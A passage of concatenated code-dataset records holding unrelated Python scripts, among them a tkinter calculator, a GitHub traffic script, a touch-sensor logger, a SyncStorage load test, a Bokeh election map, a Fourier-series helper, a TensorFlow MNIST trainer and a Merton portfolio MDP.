realstack.push(int(t2) - int(t1))\n elif i == '*':\n t1 = realstack.pop()\n t2 = realstack.pop()\n realstack.push(int(t2) *int(t1))\n elif i == '/':\n t1 = realstack.pop()\n t2 = realstack.pop()\n realstack.push(int(t2) / int(t1))\n return realstack.pop()\n\ndef fuck(x):\n x=postfix(x)\n return calcu(x)\n\ndef frame(root, side):\n w = Frame(root)\n w.pack(side=side, expand=YES, fill=BOTH)\n return w\n\n\ndef button(root, side, text, command=None):\n w = Button(root, text=text, command=command)\n w.pack(side=side, expand=YES, fill=BOTH)\n return w\n\n\nclass Calculator(Frame):\n def __init__(self):\n\n Frame.__init__(self)\n\n self.pack(expand=YES, fill=BOTH)\n self.master.title('Simple Calculater')\n\n display = StringVar()\n\n Entry(self, relief=SUNKEN,textvariable=display).pack(side=TOP, expand=YES,fill=BOTH)\n\n for key in ('123', '456', '789', '-0.'):\n keyF = frame(self, TOP)\n for char in key:\n button(keyF, LEFT, char, lambda w=display, c=char: w.set(w.get() + c))\n\n opsF = frame(self, TOP)\n for char in '+-*/=':\n if char == '=':\n btn = button(opsF, LEFT, char)\n btn.bind('', lambda e, s=self, w=display: s.calc(w), '+')\n\n else:\n btn = button(opsF, LEFT, char, lambda w=display, s='%s' % char: w.set(w.get() + s))\n\n clearF = frame(self, BOTTOM)\n button(clearF, LEFT, 'clear', lambda w=display: w.set(''))\n\n\n\n def calc(self, display):\n try:\n display.set(fuck(display.get()))\n except:\n display.set(\"ERROR\")\n\n\n\nif __name__ == '__main__':\n print('ok')\n Calculator().mainloop()\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138951876","text":"\"\"\"\n@author: BeBlob\n\"\"\"\nimport argparse\nimport os\nimport pika\nimport S4_simple_queue_publish as ppub \nimport S4_simple_queue_read as rpub \n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--read\", help=\"read the messages\",\n action=\"store_true\")\nparser.add_argument(\"--publish\", help=\"write a message\",\n action=\"store_true\")\nargs = parser.parse_args()\n\nif args.read:\n print(\"read mode turned on\")\n rpub.read_messages()\n \nelif args.publish:\n print(\"publish mode turned on\")\n ppub.publish_message()\n\nelse :\n print('Aucun arguments 
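# --- Editor's illustrative sketch (assumes integer tokens and binary operators only):
# --- the calculator above converts infix to postfix with an operator-precedence stack
# --- (shunting-yard) and then evaluates the postfix form. The conversion in miniature:
def to_postfix(tokens):
    prec = {'(': 1, '+': 2, '-': 2, '*': 3, '/': 3}
    ops, out = [], []
    for t in tokens:
        if t.isdigit():
            out.append(t)
        elif t == '(':
            ops.append(t)
        elif t == ')':
            while ops[-1] != '(':
                out.append(ops.pop())
            ops.pop()  # discard the matching '('
        else:
            while ops and prec[ops[-1]] >= prec[t]:
                out.append(ops.pop())
            ops.append(t)
    return out + ops[::-1]

assert to_postfix(['(', '1', '+', '2', ')', '*', '3']) == ['1', '2', '+', '3', '*']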
valables')\n","sub_path":"s4/S4_queue_publish_read.py","file_name":"S4_queue_publish_read.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"12257630","text":"#!/usr/bin/python3\n\nimport pandas\nimport os\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom urllib.parse import urljoin\n\nuser = 'avcourt' # your github username\nkey = os.environ.get('GH_API') # your secret access token. you can hardcode yours.\n\nrepos_url = f'https://api.github.com/users/{user}/repos'\nrepo_names = [repo[\"name\"] for repo in requests.get(repos_url).json()]\n\ninsights = []\nbase_url = f'https://api.github.com/repos/{user}/'\n\nprint(\"Getting traffic insights for repos:\")\nfor repo in repo_names:\n    print(f\"\\t- github.com/{user}/{repo}/\")\n    repo_url = urljoin(base_url, repo + '/')\n    traffic = requests.get(urljoin(repo_url, 'traffic/views'),\n                           auth=HTTPBasicAuth(user, key)).json()\n\n    clones = requests.get(urljoin(repo_url, 'traffic/clones'),\n                          auth=HTTPBasicAuth(user, key)).json()[\"count\"]\n\n    insights.append({'repo': repo,\n                     'views': traffic['count'],\n                     'uniques': traffic['uniques'],\n                     'clones': clones\n                     })\n\nprint(\"\\n-- INSIGHTS --------------- Views / Clones --\")\nprint(\"---------------------------------------------\")\nprint(pandas.DataFrame(insights).to_string(index=False))\n","sub_path":"traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"172593548","text":"# Last changed May 31st, 2017\n# Thresholds set at (4,2) within MPR121_edited.py\n# Always run this script with sudo, otherwise you won't get access to the MPR121\n# Also use python 3, otherwise the datetime.timestamp and datetime.fromtimestamp methods won't work\n\n\"\"\"This function prints the ‘raw’ ADC values for all 12 electrodes from a single sensor.\nNormal untouched ADC values should range between 215-230, whereas they should decrease\nto about 50-90 when touched. Different sensor addresses can be selected by adding the\n-a or --address option followed by either one of the following addresses:\n0x5A, 0x5B, 0x5C, 0x5D (for sensors 1-4, respectively).\nData can be saved to a .txt file through the -s or --save option.\n\"\"\"\n\nimport sys, time, argparse\nfrom datetime import datetime\nimport Adafruit_MPR121.MPR121_edited as MPR121\n\n# Set up argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--save', help = 'save raw ADC values to a .txt file',\naction = \"store_true\")\nparser.add_argument('-a', '--address', help = 'specify MPR121 address (values: \\\n0x5A (default), 0x5B, 0x5C, 0x5D)', type = str)\nargs = parser.parse_args()\n\nif args.address == None or args.address == '0x5A':\n    address = 0x5A\nelif args.address == '0x5B':\n    address = 0x5B\nelif args.address == '0x5C':\n    address = 0x5C\nelif args.address == '0x5D':\n    address = 0x5D \nelif not args.address in ['0x5A', '0x5B', '0x5C', '0x5D']:\n    print('Error: invalid address specified (must be 0x5A, 0x5B, 0x5C, or 0x5D).')\n    sys.exit(1)\n\n# Create MPR121 instance.\ncap = MPR121.MPR121()\n\n# Start communication with the MPR121 chip.\nif not cap.begin(address=address):\n    print('Error initializing MPR121. 
Check your wiring!')\n    sys.exit(1)\n\nif args.save:\n    # Ask user for mouse ID and trial number to create corresponding text file.\n    filename = input('Filename: ')\n    if filename[-4:] != '.txt':\n        filename += '.txt'\n\n# Main loop to print a message every time a pin is touched.\n# Note: this takes about 20 ms per loop iteration!\nprint('Collecting data. Press Ctrl-C to quit.')\nwhile True:\n    touch_status = cap.touched()\n\n    filtered = [cap.filtered_data(i) for i in range(12)]\n\n    # Print touch status and raw data:\n    print('Touch status: {}, Filtered: {}'.format(str(touch_status).zfill(4),filtered), end=12*' ', flush=True)\n    print('\\r', end='', flush=True)\n\n    if args.save:\n        with open(filename, 'a') as f:\n            f.write('{}, {}, {}\\n'.format(datetime.now().timestamp(),str(touch_status).zfill(4),str(filtered).strip('[]'))) # Convert touch_status and filtered to strings before formatting.\n","sub_path":"single_sensor_test.py","file_name":"single_sensor_test.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"398749570","text":"# ex27 The Truth Terms & The Truth Tables\n# ex28 Boolean Practice\n# ex29 What If\npeople = 20\ncats = 30\ndogs = 15\ndogs += 5\nif people >= dogs:\n    print(\"People are greater than or equal to dogs\") \nif people <= dogs:\n    print(\"People are less than or equal to dogs\")\nif people == dogs:\n    print(\"People are dogs.\")\n\n# ex30 Else and If\ncars = 40\ntrucks = 15\nif cars > people:\n    print(\"We should take the cars\")\nelif cars < people:\n    print(\"We should not take the cars\")\nelse:\n    print(\"We can't decide\")","sub_path":"learn-python-the-hard-way/Ex27-30.py","file_name":"Ex27-30.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"399308703","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
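# --- Editor's sketch (hypothetical reader stub and file name): when sampling ~50 times
# --- per second, opening the log file once outside the loop and flushing per sample is
# --- cheaper than reopening it in append mode on every iteration, as the loop above does:
import time
from datetime import datetime

def log_samples(read_sample, path='sensor_log.txt', n=3, period=0.02):
    with open(path, 'a') as f:
        for _ in range(n):
            status, filtered = read_sample()
            f.write('{}, {}, {}\n'.format(datetime.now().timestamp(),
                                          str(status).zfill(4),
                                          str(filtered).strip('[]')))
            f.flush()
            time.sleep(period)

log_samples(lambda: (0, [220] * 12))  # stubbed reader instead of real MPR121 hardware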
If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\"\"\"\nLoad test for the SyncStorage server\n\"\"\"\nimport os\nimport hmac\nimport random\nimport time\nfrom urllib.parse import urlparse, urlunparse\nimport base64\nimport hashlib\n\nfrom tokenlib import make_token, get_derived_secret as derive\nimport browserid.jwt\nimport browserid.tests.support\n\nfrom molotov import (json_request, global_setup, set_var, get_var, scenario,\n setup)\n\n\n# Assertions are good for one year (in seconds).\n# This avoids having to deal with clock-skew in tokenserver requests.\nASSERTION_LIFETIME = 60 * 60 * 24 * 365\n\nMOCKMYID_DOMAIN = \"mockmyid.s3-us-west-2.amazonaws.com\"\nMOCKMYID_PRIVATE_KEY = browserid.jwt.DS128Key({\n \"algorithm\": \"DS\",\n \"x\": \"385cb3509f086e110c5e24bdd395a84b335a09ae\",\n \"y\": \"738ec929b559b604a232a9b55a5295afc368063bb9c20fac4e53a74970a4db795\"\n \"6d48e4c7ed523405f629b4cc83062f13029c4d615bbacb8b97f5e56f0c7ac9bc1\"\n \"d4e23809889fa061425c984061fca1826040c399715ce7ed385c4dd0d40225691\"\n \"2451e03452d3c961614eb458f188e3e8d2782916c43dbe2e571251ce38262\",\n \"p\": \"ff600483db6abfc5b45eab78594b3533d550d9f1bf2a992a7a8daa6dc34f8045a\"\n \"d4e6e0c429d334eeeaaefd7e23d4810be00e4cc1492cba325ba81ff2d5a5b305a\"\n \"8d17eb3bf4a06a349d392e00d329744a5179380344e82a18c47933438f891e22a\"\n \"eef812d69c8f75e326cb70ea000c3f776dfdbd604638c2ef717fc26d02e17\",\n \"q\": \"e21e04f911d1ed7991008ecaab3bf775984309c3\",\n \"g\": \"c52a4a0ff3b7e61fdf1867ce84138369a6154f4afa92966e3c827e25cfa6cf508b\"\n \"90e5de419e1337e07a2e9e2a3cd5dea704d175f8ebf6af397d69e110b96afb17c7\"\n \"a03259329e4829b0d03bbc7896b15b4ade53e130858cc34d96269aa89041f40913\"\n \"6c7242a38895c9d5bccad4f389af1d7a4bd1398bd072dffa896233397a\",\n})\n\n\n_DEFAULT = \"https://token.stage.mozaws.net\"\n\n\ndef b64encode(data):\n return base64.b64encode(data).decode(\"ascii\")\n\n\nclass StorageClient(object):\n def __init__(self, server_url=_DEFAULT):\n self.timeskew = 0\n self.server_url = server_url\n self.auth_token = None\n self.auth_secret = None\n self.endpoint_url = None\n self.endpoint_scheme = None\n self.endpoint_host = None\n self.generate()\n\n def __repr__(self):\n return str(self.auth_token)\n\n def generate(self):\n \"\"\"Pick an identity, log in and generate the auth token.\"\"\"\n # If the server_url has a hash fragment, it's a storage node and\n # that's the secret. 
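# --- Editor's illustrative sketch: the client in this record authenticates with a
# --- Hawk-style MAC: the request fields are joined with newlines, signed with
# --- HMAC-SHA256, and the digest is base64-encoded. The signing step in isolation:
import base64
import hashlib
import hmac

def sign_request(secret, ts, nonce, method, path, host, port, hash_='', ext=''):
    normalized = '\n'.join(['hawk.1.header', ts, nonce, method, path,
                            host.lower(), port, hash_, ext, ''])
    digest = hmac.new(secret, normalized.encode('ascii'), hashlib.sha256).digest()
    return base64.b64encode(digest).decode('ascii')

mac = sign_request(b'secret-key', '1700000000', 'AbCdE=', 'GET',
                   '/info/collections', 'example.org', '443')
assert len(mac) == 44  # base64 of a 32-byte SHA-256 digest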
Otherwise it's a token server url.\n uid = random.randint(1, 1000000)\n url = urlparse(self.server_url)\n if url.fragment:\n endpoint = url._replace(fragment=\"\", path=\"/1.5/\" + str(uid))\n self.endpoint_url = urlunparse(endpoint)\n data = {\n \"uid\": uid,\n \"node\": urlunparse(url._replace(fragment=\"\")),\n \"expires\": time.time() + ASSERTION_LIFETIME,\n }\n self.auth_token = make_token(data, secret=url.fragment)\n self.auth_secret = derive(self.auth_token, secret=url.fragment)\n else:\n email = \"user%s@%s\" % (uid, MOCKMYID_DOMAIN)\n exp = time.time() + ASSERTION_LIFETIME + self.timeskew\n assertion = browserid.tests.support.make_assertion(\n email=email,\n audience=self.server_url,\n issuer=MOCKMYID_DOMAIN,\n issuer_keypair=(None, MOCKMYID_PRIVATE_KEY),\n exp=int(exp * 1000),\n )\n token_url = self.server_url + \"/1.0/sync/1.5\"\n response = json_request(token_url, headers={\n \"Authorization\": \"BrowserID \" + assertion,\n })\n # Maybe timeskew between client and server?\n if response['status'] == 401:\n server_time = int(response['headers'][\"X-Timestamp\"])\n self.timeskew = server_time - int(time.time())\n exp = time.time() + ASSERTION_LIFETIME + self.timeskew\n assertion = browserid.tests.support.make_assertion(\n email=email,\n audience=self.server_url,\n issuer=MOCKMYID_DOMAIN,\n issuer_keypair=(None, MOCKMYID_PRIVATE_KEY),\n exp=int(exp * 1000),\n )\n response = json_request(token_url, headers={\n \"Authorization\": \"BrowserID \" + assertion,\n })\n\n if response['status'] > 299:\n raise ValueError(response['status'])\n\n credentials = response['content']\n self.auth_token = credentials[\"id\"].encode('ascii')\n self.auth_secret = credentials[\"key\"].encode('ascii')\n self.endpoint_url = credentials[\"api_endpoint\"]\n\n url = urlparse(self.endpoint_url)\n self.endpoint_scheme = url.scheme\n if ':' in url.netloc:\n self.endpoint_host, self.endpoint_port = url.netloc.rsplit(\":\", 1)\n else:\n self.endpoint_host = url.netloc\n if url.scheme == \"http\":\n self.endpoint_port = \"80\"\n else:\n self.endpoint_port = \"443\"\n\n def _normalize(self, params, path_qs, meth='GET'):\n bits = []\n bits.append(\"hawk.1.header\")\n bits.append(params[\"ts\"])\n bits.append(params[\"nonce\"])\n bits.append(meth)\n bits.append(path_qs)\n bits.append(self.endpoint_host.lower())\n bits.append(self.endpoint_port)\n bits.append(params.get(\"hash\", \"\"))\n bits.append(params.get(\"ext\", \"\"))\n bits.append(\"\") # to get the trailing newline\n return \"\\n\".join(bits)\n\n def _sign(self, params, path_qs, meth='GET'):\n algorithm = \"sha256\"\n sigstr = self._normalize(params, path_qs, meth)\n sigstr = sigstr.encode(\"ascii\")\n key = self.auth_secret\n hashmod = hashlib.sha256\n return b64encode(hmac.new(key, sigstr, hashmod).digest())\n\n def _auth(self, params, path_qs, meth='GET'):\n params = {\"ts\": str(int(time.time()) + self.timeskew)}\n params[\"id\"] = self.auth_token.decode('ascii')\n params[\"ts\"] = str(int(time.time()))\n params[\"nonce\"] = b64encode(os.urandom(5))\n params[\"mac\"] = self._sign(params, path_qs, meth)\n res = ', '.join(['%s=\"%s\"' % (k, v) for k, v in params.items()])\n return 'Hawk ' + res\n\n async def get(self, session, path_qs, *args, **kw):\n url = self.endpoint_url + path_qs\n headers = {'Authorization': self._auth('GET', path_qs),\n 'Host': self.endpoint_host}\n\n async with session.get(url, headers=headers) as resp:\n if resp.status == 401:\n server_time = int(float(resp.headers[\"X-Weave-Timestamp\"]))\n self.timeskew = server_time - 
int(time.time())\n headers['Authorization'] = self._auth('GET', path_qs)\n async with session.get(url, headers=headers) as resp:\n return resp\n else:\n return resp\n\n\n@global_setup()\ndef set_token(args):\n set_var('client', StorageClient())\n\n\n@scenario(1)\nasync def test(session):\n storage = get_var('client')\n url = \"/info/collections\"\n\n resp = await storage.get(session, url)\n assert resp.status in (200, 404)\n","sub_path":"loadtest.py","file_name":"loadtest.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"272049247","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Data handling\nimport pandas as pd\nimport numpy as np\n\n# Bokeh libraries\nfrom bokeh.io import output_file, output_notebook\nfrom bokeh.plotting import figure, show\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.layouts import row, column, gridplot\nfrom bokeh.models.widgets import Tabs, Panel\n\n#Plotting\nimport geopandas as gpd\n\nfig = figure()\n\n\ndf = pd.read_csv('cleanfeatures.csv', index_col=0)\ndf.rename(columns={'Election type':'Election_type'}, inplace=True)\n\n# Import reset_output (only needed once)\nfrom bokeh.plotting import reset_output\n\n# Use reset_output() between subsequent show() calls, as needed\nreset_output()\n\n\nshapefile = 'Shape_Files/ne_110m_admin_0_countries.shp'\n#Read shapefile using Geopandas\ngdf = gpd.read_file(shapefile)[['ADMIN', 'ADM0_A3', 'geometry']]\n#Rename columns.\ngdf.columns = ['country', 'country_code', 'geometry']\ngdf = gdf.drop(gdf.index[159])\n\n\n#Drop row corresponding to 'Antarctica'\ngdf = gdf.drop(gdf.index[159])\n\n\nfrom bokeh.io import curdoc, output_notebook\nfrom bokeh.models import Slider, HoverTool\nfrom bokeh.layouts import widgetbox, row, column\nfrom bokeh.models import GeoJSONDataSource, LinearColorMapper, ColorBar\nfrom bokeh.palettes import brewer\nimport json\n#Define function that returns json_data for year selected by user.\n\ndef json_data(selectedYear):\n yr = selectedYear\n df_yr = df[df['Year'] == yr]\n merged = gdf.merge(df_yr, left_on = 'country_code', right_on ='iso3', how = 'left')\n merged.fillna('No data', inplace = True)\n merged_json = json.loads(merged.to_json())\n json_data = json.dumps(merged_json)\n return json_data\n#Input GeoJSON source that contains features for plotting.\ngeosource = GeoJSONDataSource(geojson = json_data('2016'))\n#Define a sequential multi-hue color palette.\npalette = brewer['YlGnBu'][5]\n#Reverse color order so that dark blue is highest obesity.\npalette = palette[::-1]\n#Instantiate LinearColorMapper that linearly maps numbers in a range, into a sequence of colors. 
Input nan_color.\ncolor_mapper = LinearColorMapper(palette = palette, low = 0, high = 100, nan_color = '#d9d9d9')\n#Define custom tick labels for color bar.\ntick_labels = {'0': '0%', '20':'20%', '40':'40%', '60':'60%', '80': '80%', '100': '100%'}\n#Add hover tool\nhover = HoverTool(tooltips = [ ('Country/region','@Country'),('Type of election', '@Election_type'),('% of voting age population that voted', '@VAP_Turnout_Percentage{11.11}'), ('Compulsory Voting', '@Compulsory_voting')])\n#Create color bar.\ncolor_bar = ColorBar(color_mapper=color_mapper, label_standoff=8,width = 500, height = 20,\n border_line_color=None,location = (0,0), orientation = 'horizontal', major_label_overrides = tick_labels)\n#Create figure object.\np = figure(title = 'Registered Voters who Voted, 2016', plot_height = 600 , plot_width = 950, toolbar_location = 'below', toolbar_sticky=True, tools = [hover])\np.xgrid.grid_line_color = None\np.ygrid.grid_line_color = None\n#Add patch renderer to figure.\np.patches('xs','ys', source = geosource,fill_color = {'field' :'VAP_Turnout_Percentage', 'transform' : color_mapper},\n line_color = 'black', line_width = 0.25, fill_alpha = 1)\n#Specify layout\np.add_layout(color_bar, 'below')\n# Define the callback function: update_plot\ndef update_plot(attr, old, new):\n yr = slider.value\n new_data = json_data(yr)\n geosource.geojson = new_data\n p.title.text = 'Voting Age Population That Voted, %d' %yr\n\n# Make a slider object: slider\nslider = Slider(title = 'Year',start = 1990, end = 2017, step = 1, value = 2016)\nslider.on_change('value', update_plot)\n# Make a column layout of widgetbox(slider) and plot, and add it to the current document\nlayout = column(p,widgetbox(slider))\ncurdoc().add_root(layout)\n#Display plot inline in Jupyter notebook\noutput_notebook()\n#Display plot\nshow(layout)\n","sub_path":"MapScript.py","file_name":"MapScript.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569956654","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 29 20:01:32 2017\n\n@author: Joao Marcos Costa\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\n\ndef _cos(x,func,n_,w_):\n\treturn func(x)*np.cos(x*n_*w_)\n\t\n\n\n\t\ndef _sin(x,func,n_,w_):\n\treturn func(x)*np.sin(x*n_*w_)\n\t\ndef an_bn(func,T0,n=10):\n\tbn=np.zeros(n)\n\tW = 2*np.pi/T0\n\tan=np.zeros(n)\n\n\tfor i in range(n):\n\t\tan[i]=(2/T0)*(integrate.quad(_cos,0,T0,args=(func,i,W))[0])\n\t\tbn[i]=(2/T0)*(integrate.quad(_sin,0,T0,args=(func,i,W))[0])\n\n\treturn an,bn\n\ndef rebuild(an_coefs,bn_coefs,T,x):\n\tw0 = 2*np.pi/T\n\tN = len(an_coefs)\n\tf_sum = 0\n\tfor n in range(N):\n\t\tf_sum += an_coefs[n]*np.cos(x*n*w0)\n\t\tf_sum += bn_coefs[n]*np.sin(x*n*w0)\n\treturn f_sum\n\t\nx = np.linspace(0,10,10000)\nT0 = 1/5000\n\n\n\n","sub_path":"fseries.py","file_name":"fseries.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168916831","text":"from tensorflow.examples.tutorials.mnist import input_data\r\nimport tensorflow as tf\r\nimport tensorflow.contrib.slim as slim\r\nimport numpy as np\r\nimport argparse\r\n\r\n\r\ndef model(input, is_training):\r\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\r\n activation_fn=tf.nn.crelu,\r\n normalizer_fn=slim.batch_norm,\r\n normalizer_params={'is_training':is_training, 'decay':0.9}):\r\n conv1 = slim.conv2d(input, 
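# --- Editor's worked example for the Fourier-series record above: for a T-periodic
# --- square wave of amplitude 1, every cosine coefficient vanishes and b_n = 4/(n*pi)
# --- for odd n, so the quadrature in an_bn can be checked against a closed form:
import numpy as np
from scipy import integrate

T0 = 2.0
w = 2 * np.pi / T0

def square(x):
    return 1.0 if (x % T0) < T0 / 2 else -1.0

b3 = (2 / T0) * integrate.quad(lambda x: square(x) * np.sin(3 * w * x),
                               0, T0, points=[T0 / 2])[0]
assert abs(b3 - 4 / (3 * np.pi)) < 1e-6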
16, kernel_size=3, scope='conv1')\r\n pool1 = slim.max_pool2d(conv1, kernel_size=2, scope='pool1')\r\n conv2 = slim.conv2d(pool1, 32, kernel_size=3, scope='conv2')\r\n pool2 = slim.max_pool2d(conv2, kernel_size=2, scope='pool2')\r\n flatten = slim.flatten(pool2, scope='flatten')\r\n fc1 = slim.fully_connected(flatten, 500, scope='fc1')\r\n dropout = slim.dropout(fc1, is_training=is_training)\r\n fc2 = slim.fully_connected(dropout, 10, activation_fn=None, scope='out')\r\n return fc2\r\n\r\ndef train(mnist):\r\n x = tf.placeholder(tf.float32, [None, 28, 28, 1], name='x-input')\r\n y_ = tf.placeholder(tf.float32, [None, 10], name='y-input')\r\n global_step = tf.Variable(0, trainable=False)\r\n\r\n y = model(x, True)\r\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=y, labels=y_)\r\n cross_entropy = tf.reduce_mean(cross_entropy)\r\n\r\n accuracy = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\r\n accuracy = tf.reduce_mean(tf.cast(accuracy, tf.float32))\r\n\r\n learning_rate = tf.train.exponential_decay(learning_rate=args.learning_rate, global_step=global_step,\r\n decay_steps=mnist.train.num_examples // args.batch_size,\r\n decay_rate=args.learning_rate_decay)\r\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(update_ops):\r\n train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(cross_entropy, global_step)\r\n\r\n saver = tf.train.Saver()\r\n init = tf.global_variables_initializer()\r\n\r\n with tf.Session() as sess:\r\n init.run()\r\n for i in range(args.max_step):\r\n xs, ys = mnist.train.next_batch(args.batch_size)\r\n xs = np.reshape(xs, [args.batch_size, 28, 28, 1])\r\n _, loss, acc, step = sess.run([train_step, cross_entropy, accuracy, global_step], feed_dict={x: xs, y_: ys})\r\n if step % 500 == 0:\r\n print('{} epoches, loss: {}, accuracy: {}'.format(step, loss, acc))\r\n\r\n if step % 1000 == 0:\r\n saver.save(sess, args.logs + 'mnist_bn_model', global_step)\r\n\r\n\r\ndef evaluate(mnist):\r\n x = tf.placeholder(tf.float32, [None, 28, 28, 1], name='x-input')\r\n y_ = tf.placeholder(tf.float32, [None, 10], name='y-input')\r\n\r\n y = model(x, False)\r\n\r\n pred = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\r\n accuracy = tf.reduce_mean(tf.cast(pred, tf.float32))\r\n\r\n feed_dict = {x: np.reshape(mnist.validation.images, [-1, 28, 28, 1]), y_: mnist.validation.labels}\r\n saver = tf.train.Saver()\r\n\r\n with tf.Session() as sess:\r\n saver.restore(sess, args.logs + 'mnist_bn_model-' + str(args.max_step))\r\n acc = sess.run(accuracy, feed_dict=feed_dict)\r\n print('test accuracy: {}'.format(acc))\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='train or evaluate mnist of using bn layer')\r\n parser.add_argument('command', metavar='', help='train or evaluate')\r\n parser.add_argument('--batch_size', default=100, help='num pictures of one batch')\r\n parser.add_argument('--learning_rate', default=0.8, help='initial learning rate of the net')\r\n parser.add_argument('--learning_rate_decay', default=0.9, help='rate decay after one epoch')\r\n parser.add_argument('--max_step',default=3000, help='total step for training')\r\n parser.add_argument('--logs', default='path/logs/', help='Logs and checkpoints directory')\r\n\r\n args = parser.parse_args()\r\n print('command:', args.command)\r\n print('batch_size:', args.batch_size)\r\n print('learning_rate:', args.learning_rate)\r\n print('learning_rate_decay:', args.learning_rate_decay)\r\n print('max_step:', args.max_step)\r\n\r\n 
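# --- Editor's note as code: tf.train.exponential_decay (non-staircase, as used above)
# --- computes lr = base * decay_rate ** (global_step / decay_steps). Checking the
# --- schedule configured here (base 0.8, decay 0.9, one decay period per epoch):
def decayed_lr(base, rate, step, decay_steps):
    return base * rate ** (step / decay_steps)

steps_per_epoch = 55000 // 100  # MNIST training-set size / batch size
assert abs(decayed_lr(0.8, 0.9, 0, steps_per_epoch) - 0.8) < 1e-12
assert abs(decayed_lr(0.8, 0.9, steps_per_epoch, steps_per_epoch) - 0.72) < 1e-12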
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)\r\n if args.command == 'train':\r\n train(mnist)\r\n else:\r\n print('loading weights...')\r\n evaluate(mnist)","sub_path":"tensorlfow bn_layer/mnist_bn.py","file_name":"mnist_bn.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"593395100","text":"class Solution(object):\n def pivotIndex(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n l_sum = 0 \n r_sum = sum(nums)\n n = len(nums)\n \n for i in range(0,n):\n r_sum -= nums[i]\n if l_sum==r_sum:\n return i\n l_sum += nums[i]\n \n return -1","sub_path":"Pivot_index/pivot_index_sol1.py","file_name":"pivot_index_sol1.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"574885955","text":"from typing import TypeVar, Sequence, Mapping, Set, Tuple\nfrom scipy.linalg import eig\nfrom base_files import mdp\nfrom base_files import value_iteration\nimport numpy as np\nimport random\nimport copy\nimport math\n\nS = Tuple[float, float]\nA = Tuple[float, float]\n\ntrans_matrix_type = Mapping[S, Mapping[A, Mapping[S, float]]]\nreward_type = Mapping[S, Mapping[A, float]]\npolicy_type = Mapping[S, Mapping[A, float]]\n\nclass mertonPortofolio():\n def __init__(self, \n expiry : float, \n r : float, \n mu : np.ndarray,\n cov : np.ndarray,\n epsilon: float,\n gamma: float):\n self.expiry = expiry # = T\n self.r = r # = risk-free rate\n self.mu = mu # = risky rate means (1-D array of length num risky assets)\n self.cov = cov # = risky rate covariances (2-D square array of length num risky assets)\n self.epsilon = epsilon # = bequest parameter\n self.gamma = gamma # = CRRA parameter\n\n def getMertonTransition(self, \n state: Tuple[float, float], \n action: Tuple[float, float]):\n risky_return = np.random.normal(self.mu[0], self.cov[0])\n wealth = state[1]\n risky_allocation = action[0]\n wealth_consumption = action[1]\n next_wealth = (wealth - wealth_consumption) * \\\n ((1 - risky_allocation) * (1 + self.r) + risky_allocation * (1 + risky_return))\n return [state[0] + 1, next_wealth[0]]\n\n def getMertonReward(self, state: S) ->float :\n time = state[0]\n wealth = state[1]\n if time != self.expiry:\n if self.gamma == 0:\n return np.log(wealth)\n else:\n return wealth ** (1.0-self.gamma) / (1.0-self.gamma)\n else:\n return 0.0\n\n def getMertonDataAll(self,\n state: Tuple[float, float]) -> Tuple[trans_matrix_type, reward_type, policy_type]:\n transition_matrix : trans_matrix_type = {}\n reward : reward_type = {}\n policy : policy_type = {}\n t = 0\n all_merton_states = []\n all_merton_states.append(state)\n while t < self.expiry:\n state = tuple(all_merton_states.pop(0))\n # assume for each state, there are two possible actions, each are generated randomly\n # this assumption is made so that we can simplify the MDP\n action_1 = tuple([random.uniform(0, 5), random.uniform(0, 5)])\n action_2 = tuple([random.uniform(0, 5), random.uniform(0, 5)])\n next_state_1 = tuple(self.getMertonTransition(state, action_1))\n next_state_2 = tuple(self.getMertonTransition(state, action_2))\n sub_dict_1 = {action_1: {next_state_1: 1.0}}\n sub_dict_2 = {action_2: {next_state_2: 1.0}} \n if state in transition_matrix.keys():\n list1 = list(transition_matrix.items())\n list2 = list(sub_dict_1.items())\n list1[0][1][list2[0][0]] = list2[0][1]\n transition_matrix = dict(list1)\n list1 = 
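# --- Editor's usage sketch for the pivot-index record above: keep a running left sum
# --- and derive the right sum by subtracting the current element from the total, so the
# --- scan is O(n) with O(1) extra space:
def pivot_index(nums):
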